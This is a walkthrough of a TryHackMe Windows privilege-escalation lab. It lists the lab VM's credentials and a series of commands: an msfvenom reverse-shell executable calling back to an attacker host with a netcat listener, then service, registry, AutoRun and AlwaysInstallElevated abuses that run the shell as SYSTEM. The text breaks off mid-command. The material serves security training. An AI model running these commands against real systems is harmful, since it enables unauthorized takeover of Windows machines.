Practice your skills with this TryhackMe Windows PrivEsc on an intentionally misconfigured Windows VM with multiple ways to get admin/SYSTEM! RDP is available. Credentials: user:password321

Windows PrivEsc v1.0windows10privesc
Task 1 – Deploy the Machine
IP: 10.10.187.249
User: user
Password: password321
Protocol: RDP
xfreerdp /u:user /p:password321 /cert:ignore /v:10.10.187.249
Make sure you are connected to the TryHackMe VPN or using the in-browser Kali instance before trying to access the Windows VM!

Task2 – Generate a Reverse Shell Executable
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.10.10 LPORT=53 -f exe -o reverse.exe
sudo nc -nvlp 53
Send generated reverse shell into Windows system
copy \\10.10.10.10\kali\reverse.exe C:\PrivEsc\reverse.exe
C:\PrivEsc\reverse.exe
Task3 – Service Exploits – Insecure Service Permissions
C:\PrivEsc\accesschk.exe /accepteula -uwcqv user daclsvc
sc qc daclsvc
sc config daclsvc binpath= "\"C:\PrivEsc\reverse.exe\""
net start daclsvc
What is the original BINARY_PATH_NAME of the daclsvc service?
C:\Program Files\DACL Service\daclservice.exe
Task4 – Service Exploits – Unquoted Service Path
sc qc unquotedsvc
C:\PrivEsc\accesschk.exe /accepteula -uwdq "C:\Program Files\Unquoted Path Service\"
copy C:\PrivEsc\reverse.exe "C:\Program Files\Unquoted Path Service\Common.exe"
net start unquotedsvc
What is the BINARY_PATH_NAME of the unquotedsvc service?
C:\Program Files\Unquoted Path Service\Common Files\unquotedpathservice.exe
Task 5 – Service Exploits – Weak Registry Permissions
sc qc regsvc
C:\PrivEsc\accesschk.exe /accepteula -uvwqk HKLM\System\CurrentControlSet\Services\regsvc
reg add HKLM\SYSTEM\CurrentControlSet\services\regsvc /v ImagePath /t REG_EXPAND_SZ /d C:\PrivEsc\reverse.exe /f
net start regsvc
Task 6 – Service Exploits – Insecure Service Executables
sc qc filepermsvc
C:\PrivEsc\accesschk.exe /accepteula -quvw "C:\Program Files\File Permissions Service\filepermservice.exe"
copy C:\PrivEsc\reverse.exe "C:\Program Files\File Permissions Service\filepermservice.exe" /Y
net start filepermsvc
Task 7 – Registry – AutoRuns
reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
C:\PrivEsc\accesschk.exe /accepteula -wvu "C:\Program Files\Autorun Program\program.exe"
copy C:\PrivEsc\reverse.exe "C:\Program Files\Autorun Program\program.exe" /Y
rdesktop 10.10.187.249
TAsk 8 – Registry – AlwaysInstallElevated
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.10.10 LPORT=53 -f msi -o revers


TryhackMe Windows PrivEsc
